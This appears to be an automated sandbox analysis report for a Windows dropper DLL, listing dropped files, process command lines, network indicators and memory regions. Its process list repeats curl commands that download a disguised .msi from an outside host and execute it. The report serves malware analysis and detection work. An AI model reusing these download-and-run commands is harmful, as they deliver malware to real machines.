Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Code page: 1252, Title: Office
16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com 16.0.15726.20202, Subject:
Office 16 Click-to-Run Licensing Component - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com, Author: Microsoft
Corporation, Keywords: Installer, Template: Intel;1033, Revision Number: {5A98002E-3B20-4BF2-9AFA-74F54CAB6E33}, Create Time/Date:
Sat Jul 23 13:01:26 2022, Last Saved Time/Date: Sat Jul 23 13:01:26 2022, Number of Pages: 200, Number of Words: 12, Name
of Creating Application: MSI Wrapper (10.0.51.0), Security: 2
|
modified
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\loaddll64.exe
|
loaddll64.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll,xlAutoOpen
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\rundll32.exe
|
rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",xlAutoOpen
|
||
C:\Windows\System32\cmd.exe
|
cmd /C curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o %temp%\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\cmd.exe
|
cmd /C %temp%\spclwow78x.msi
|
||
C:\Windows\System32\curl.exe
|
curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 11 hidden processes, click here to show them.
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
http://anydesk10.hospedagemdesites.ws/UIServices.jpg8
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-o%temp%
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg4
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg-oC:
|
unknown
|
||
http://anydesk10.hospedagemdesites.ws/UIServices.jpg
|
191.252.51.12
|
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
anydesk10.hospedagemdesites.ws
|
191.252.51.12
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
191.252.51.12
|
anydesk10.hospedagemdesites.ws
|
Brazil
|
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
1CC78A77000
|
heap
|
page read and write
|
||
211547E0000
|
unkown
|
page read and write
|
||
E81E6FD000
|
stack
|
page read and write
|
||
1DCAC57E000
|
heap
|
page read and write
|
||
1DCACB55000
|
heap
|
page read and write
|
||
1DCAC560000
|
heap
|
page read and write
|
||
1E70ED90000
|
unkown
|
page read and write
|
||
2F48A749000
|
heap
|
page read and write
|
||
F3596FF000
|
unkown
|
page read and write
|
||
2861D960000
|
heap
|
page read and write
|
||
21154BA9000
|
heap
|
page read and write
|
||
25D5B2A0000
|
heap
|
page read and write
|
||
25DD8C45000
|
heap
|
page read and write
|
||
22534A80000
|
heap
|
page read and write
|
||
2861D5E0000
|
unkown
|
page readonly
|
||
17F1A8E0000
|
heap
|
page read and write
|
||
16A87D2E000
|
heap
|
page read and write
|
||
2F48A499000
|
heap
|
page read and write
|
||
1DCAC57A000
|
heap
|
page read and write
|
||
17F1A9FA000
|
heap
|
page read and write
|
||
25D5B1C0000
|
unkown
|
page read and write
|
||
1DCAC5B7000
|
heap
|
page read and write
|
||
2EA2BDD0000
|
heap
|
page read and write
|
||
2F48A749000
|
heap
|
page read and write
|
||
17F1A930000
|
unkown
|
page readonly
|
||
D046EFE000
|
stack
|
page read and write
|
||
25D5B480000
|
heap
|
page read and write
|
||
149D5FF000
|
stack
|
page read and write
|
||
2133061A000
|
heap
|
page read and write
|
||
25D5B1B0000
|
unkown
|
page readonly
|
||
21154BA9000
|
heap
|
page read and write
|
||
2861D810000
|
heap
|
page read and write
|
||
1E70ED80000
|
unkown
|
page readonly
|
||
5AB3D8F000
|
stack
|
page read and write
|
||
1CC788F0000
|
heap
|
page read and write
|
||
2F48A499000
|
heap
|
page read and write
|
||
B5199FE000
|
stack
|
page read and write
|
||
F7502FF000
|
unkown
|
page read and write
|
||
1DCAC5A8000
|
heap
|
page read and write
|
||
1E70ED90000
|
unkown
|
page read and write
|
||
1DCAC56F000
|
heap
|
page read and write
|
||
2EA2BE90000
|
heap
|
page read and write
|
||
225366E0000
|
heap
|
page read and write
|
||
E81E7FF000
|
unkown
|
page read and write
|
||
2F48A350000
|
unkown
|
page read and write
|
||
211547C0000
|
unkown
|
page readonly
|
||
16A87CD0000
|
heap
|
page read and write
|
||
1E70ED70000
|
unkown
|
page readonly
|
||
149D8FE000
|
stack
|
page read and write
|
||
1E70EF20000
|
heap
|
page read and write
|
||
17F1AD40000
|
heap
|
page read and write
|
||
EBC11FF000
|
stack
|
page read and write
|
||
2861D5E0000
|
unkown
|
page readonly
|
||
1E70F020000
|
heap
|
page read and write
|
||
2F48A340000
|
unkown
|
page readonly
|
||
25DD86AB000
|
heap
|
page read and write
|
||
16A87B60000
|
heap
|
page read and write
|
||
25DD86BC000
|
heap
|
page read and write
|
||
C2342FF000
|
unkown
|
page read and write
|
||
25DD8B00000
|
heap
|
page read and write
|
||
2DCE4FF000
|
unkown
|
page read and write
|
||
17F1ABB0000
|
heap
|
page read and write
|
||
22534AF0000
|
heap
|
page read and write
|
||
1DCAC4A0000
|
heap
|
page read and write
|
||
1E70ED70000
|
unkown
|
page readonly
|
||
5AB407F000
|
stack
|
page read and write
|
||
2861D5D0000
|
unkown
|
page readonly
|
||
D046BFE000
|
stack
|
page read and write
|
||
1DCAC572000
|
heap
|
page read and write
|
||
2133060C000
|
heap
|
page read and write
|
||
2F48A340000
|
unkown
|
page readonly
|
||
22534DA0000
|
heap
|
page read and write
|
||
25DD8550000
|
heap
|
page read and write
|
||
25D5B2C0000
|
heap
|
page read and write
|
||
213303E0000
|
heap
|
page read and write
|
||
D0467FD000
|
stack
|
page read and write
|
||
A54D99C000
|
stack
|
page read and write
|
||
1DCAC530000
|
heap
|
page read and write
|
||
A90637F000
|
stack
|
page read and write
|
||
25D5B1A0000
|
unkown
|
page readonly
|
||
25DD86A0000
|
heap
|
page read and write
|
||
2F48A580000
|
heap
|
page read and write
|
||
1DCAC5B0000
|
heap
|
page read and write
|
||
21330601000
|
heap
|
page read and write
|
||
2133061A000
|
heap
|
page read and write
|
||
1CC78A30000
|
heap
|
page read and write
|
||
25D5B380000
|
heap
|
page read and write
|
||
2F48A745000
|
heap
|
page read and write
|
||
22534B6B000
|
heap
|
page read and write
|
||
22534DA5000
|
heap
|
page read and write
|
||
25DD86FC000
|
heap
|
page read and write
|
||
2133060C000
|
heap
|
page read and write
|
||
211547D0000
|
unkown
|
page readonly
|
||
17F1AD45000
|
heap
|
page read and write
|
||
213305CF000
|
heap
|
page read and write
|
||
16A87CE0000
|
heap
|
page read and write
|
||
D046AFF000
|
stack
|
page read and write
|
||
2EA2BEA3000
|
heap
|
page read and write
|
||
1CC78D60000
|
heap
|
page read and write
|
||
2F48A330000
|
unkown
|
page readonly
|
||
B5197FF000
|
stack
|
page read and write
|
||
17F1A920000
|
unkown
|
page readonly
|
||
1DCAC5A8000
|
heap
|
page read and write
|
||
213305CB000
|
heap
|
page read and write
|
||
17F1A930000
|
unkown
|
page readonly
|
||
1E70F219000
|
heap
|
page read and write
|
||
25DD86C0000
|
heap
|
page read and write
|
||
213305DF000
|
heap
|
page read and write
|
||
21154780000
|
heap
|
page read and write
|
||
25DD86C0000
|
heap
|
page read and write
|
||
211549D0000
|
heap
|
page read and write
|
||
213305C0000
|
heap
|
page read and write
|
||
1DCAC5B7000
|
heap
|
page read and write
|
||
17F1A920000
|
unkown
|
page readonly
|
||
25D5B39A000
|
heap
|
page read and write
|
||
B519BFE000
|
stack
|
page read and write
|
||
1CC78D65000
|
heap
|
page read and write
|
||
149D9FE000
|
stack
|
page read and write
|
||
B5193DD000
|
stack
|
page read and write
|
||
2EA2BE40000
|
heap
|
page read and write
|
||
1E70F210000
|
heap
|
page read and write
|
||
17F1AD49000
|
heap
|
page read and write
|
||
1DCAC5A8000
|
heap
|
page read and write
|
||
1DCAC57E000
|
heap
|
page read and write
|
||
2EA2BE70000
|
heap
|
page read and write
|
||
25DD86C3000
|
heap
|
page read and write
|
||
B5196FF000
|
stack
|
page read and write
|
||
2F48A2F0000
|
heap
|
page read and write
|
||
21330601000
|
heap
|
page read and write
|
||
2861D969000
|
heap
|
page read and write
|
||
17F1A9E0000
|
heap
|
page read and write
|
||
1E70EE70000
|
heap
|
page read and write
|
||
1CC78A70000
|
heap
|
page read and write
|
||
211547C0000
|
unkown
|
page readonly
|
||
211547D0000
|
unkown
|
page readonly
|
||
1E70EF3A000
|
heap
|
page read and write
|
||
1DCAC5A0000
|
heap
|
page read and write
|
||
21330B05000
|
heap
|
page read and write
|
||
EBC10FD000
|
stack
|
page read and write
|
||
211547E0000
|
unkown
|
page read and write
|
||
2861D5F0000
|
unkown
|
page read and write
|
||
149D6FF000
|
stack
|
page read and write
|
||
25D5B160000
|
heap
|
page read and write
|
||
2861D5D0000
|
unkown
|
page readonly
|
||
A54DCFF000
|
stack
|
page read and write
|
||
21330540000
|
heap
|
page read and write
|
||
2861D5F0000
|
unkown
|
page read and write
|
||
25D5B1B0000
|
unkown
|
page readonly
|
||
149DAFE000
|
stack
|
page read and write
|
||
1DCAC510000
|
heap
|
page read and write
|
||
21330520000
|
heap
|
page read and write
|
||
2F48A480000
|
heap
|
page read and write
|
||
149D4FD000
|
stack
|
page read and write
|
||
2F48A498000
|
heap
|
page read and write
|
||
16A87CA0000
|
heap
|
page read and write
|
||
25D5B2C9000
|
heap
|
page read and write
|
||
2F48A430000
|
heap
|
page read and write
|
||
25DD86E1000
|
heap
|
page read and write
|
||
25DD86E2000
|
heap
|
page read and write
|
||
1DCAC56B000
|
heap
|
page read and write
|
||
211548E8000
|
heap
|
page read and write
|
||
F3593FD000
|
stack
|
page read and write
|
||
213305DB000
|
heap
|
page read and write
|
||
22534B67000
|
heap
|
page read and write
|
||
1DCAC5B0000
|
heap
|
page read and write
|
||
1DCAC5A1000
|
heap
|
page read and write
|
||
17F1A950000
|
heap
|
page read and write
|
||
1E70ED30000
|
heap
|
page read and write
|
||
25DD86F3000
|
heap
|
page read and write
|
||
21330600000
|
heap
|
page read and write
|
||
1DCAC5B7000
|
heap
|
page read and write
|
||
1DCAC5A1000
|
heap
|
page read and write
|
||
1DCAC57E000
|
heap
|
page read and write
|
||
2133061A000
|
heap
|
page read and write
|
||
2DCE10D000
|
stack
|
page read and write
|
||
1DCAC576000
|
heap
|
page read and write
|
||
1E70F219000
|
heap
|
page read and write
|
||
2133060C000
|
heap
|
page read and write
|
||
2861D72A000
|
heap
|
page read and write
|
||
2861D710000
|
heap
|
page read and write
|
||
C419B7D000
|
stack
|
page read and write
|
||
25DD8C40000
|
heap
|
page read and write
|
||
213305D2000
|
heap
|
page read and write
|
||
D046DFE000
|
stack
|
page read and write
|
||
22534B10000
|
heap
|
page read and write
|
||
25D5B1A0000
|
unkown
|
page readonly
|
||
5AB3D0C000
|
stack
|
page read and write
|
||
17F1AD49000
|
heap
|
page read and write
|
||
2F48A740000
|
heap
|
page read and write
|
||
2EA2BE98000
|
heap
|
page read and write
|
||
2861D6D0000
|
heap
|
page read and write
|
||
A9062FF000
|
stack
|
page read and write
|
||
2EA2C1D0000
|
heap
|
page read and write
|
||
16A89790000
|
heap
|
page read and write
|
||
A54DC7F000
|
stack
|
page read and write
|
||
2F48A330000
|
unkown
|
page readonly
|
||
C233F1D000
|
stack
|
page read and write
|
||
21154BA0000
|
heap
|
page read and write
|
||
25D5B389000
|
heap
|
page read and write
|
||
25DD87A0000
|
heap
|
page read and write
|
||
211548D0000
|
heap
|
page read and write
|
||
F74FF7D000
|
stack
|
page read and write
|
||
16A87D20000
|
heap
|
page read and write
|
||
21330B00000
|
heap
|
page read and write
|
||
1DCAC582000
|
heap
|
page read and write
|
||
25D5B2C9000
|
heap
|
page read and write
|
||
B519AFE000
|
stack
|
page read and write
|
||
1CC7A410000
|
heap
|
page read and write
|
||
A90627C000
|
stack
|
page read and write
|
||
2861D969000
|
heap
|
page read and write
|
||
16A87CD5000
|
heap
|
page read and write
|
||
25DD86F3000
|
heap
|
page read and write
|
||
D046FFE000
|
stack
|
page read and write
|
||
1CC78A7B000
|
heap
|
page read and write
|
||
2861D590000
|
heap
|
page read and write
|
||
25D5B1C0000
|
unkown
|
page read and write
|
||
17F1A940000
|
unkown
|
page read and write
|
||
1CC78A50000
|
heap
|
page read and write
|
||
17F1A940000
|
unkown
|
page read and write
|
||
C419EFF000
|
unkown
|
page read and write
|
||
25DD86FC000
|
heap
|
page read and write
|
||
1DCAC5B0000
|
heap
|
page read and write
|
||
17F1A9E9000
|
heap
|
page read and write
|
||
211549F0000
|
heap
|
page read and write
|
||
1E70ED80000
|
unkown
|
page readonly
|
||
25D5B2C5000
|
heap
|
page read and write
|
||
213305E2000
|
heap
|
page read and write
|
||
1DCACB50000
|
heap
|
page read and write
|
||
2F48A350000
|
unkown
|
page read and write
|
||
213305DF000
|
heap
|
page read and write
|
||
22534B60000
|
heap
|
page read and write
|
There are 221 hidden memdumps, click here to show them.